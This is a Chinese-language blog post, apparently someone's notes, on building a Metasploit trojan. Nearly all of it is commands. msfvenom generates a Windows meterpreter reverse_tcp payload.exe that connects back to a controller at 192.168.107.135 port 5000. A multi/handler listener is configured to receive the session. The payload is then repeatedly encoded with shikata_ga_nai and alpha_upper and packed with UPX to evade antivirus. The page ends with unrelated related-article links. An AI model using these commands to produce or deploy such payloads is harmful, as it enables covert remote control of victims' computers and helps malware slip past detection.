• msfvenom制作主控与被控端


    • msfconsole
    • msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.107.135 lport 5000 -f exe -o /var/payload.exe

    说明:-p或--payload 后面接载荷 查看msf都有哪些载荷可以通过 msfvenom -l payloads 命令

               lhost 填写主控端IP     lpost填写主控端端口

              -f 或 --format  接输出文件的格式

             -o 或 --out  指定文件存放路径

             --payload-options   //列举payload的标准参数项

            --help-formats      //列举msf支持的输出文件格式

    关于msfvenom更详细参数使用可以参看:Metasploit——msfvenom免杀木马_小白白@的博客-CSDN博客_msfvenom免杀

    生成的payload.exe采用各种方法存放在被控端

    在主控端msfconsole下执行

    •             use exploit/multi/handler
    •             set payload windows/meterpreter/reverse_tcp  //需要与生成被控端时的payload一致
    •             set lhost 192.168.107.135
    •             set lport 5000  //这两条须与生成被控端时设置的主控端IP和端口一致
    •             exploit

    被控端执行payload.exe后,在主控端可以看到信息:

    此时主控端与被控端建立连接 。但是由于这个工具被用烂了,一般生成的被控端都会被查杀,所以通常都会对被控端进行重编码。

    msf框架里的编码功能可以对被控端进行重新编码,多次编码,多种方式混合编码

    执行 msfvenom -l encoder 可以查看编码器列表,excellent级的编码器效果更好

    • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.135 lport=5000 -e x86/nonalpha -f c

    此处输出格式选C,可以在屏幕上看到编码结果,想了解多次、混合编码效果可以输出这种格式,比较low的编码出来的代码是不变的,如上例。

    • msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.107.135 LPORT=5000 -e x86/shikata_ga_nai -i 10 -f raw |msfvenom -a x86 --platform Windows -e x86/alpha_upper -i 5 -f exe -o /var/payload.exe

    上面的命令 -i 10 表示编码10,混合编码要写多次msfvenom用并|分隔 

    第二种编码不能缺--platform Windows,会执行不下去,第一种编码写不写都会报错,但是可以继续执行,原因暂不明

     即使多次编码了,还是多半也被查出来,此时可以采用“加壳”的办法

    upx /var/payload.exe

    本文仅仅只是记录思路和命令,如上操作的被控端绝大部分还是会被查杀

  • 相关阅读:
    数学分析:数项级数的概念
    mqttws.js
    OpenCV实现FAST算法角点检测 、ORB算法特征点检测
    STM32——SDIO的学习(驱动SD卡)(实战篇)
    【读书】《北京印象》
    MyBatis多条件查询、动态SQL、多表操作、注解开发详细教程
    python re.findall和re.search同样的正则表达式,为什么规则不一样??
    什么是视频内容推荐引擎?
    【Python入门】异常处理结构
    java计算机毕业设计学生就业创业管理系统源代码+系统+数据库+lw文档
  • 原文地址:https://blog.csdn.net/angleoldhen/article/details/126019023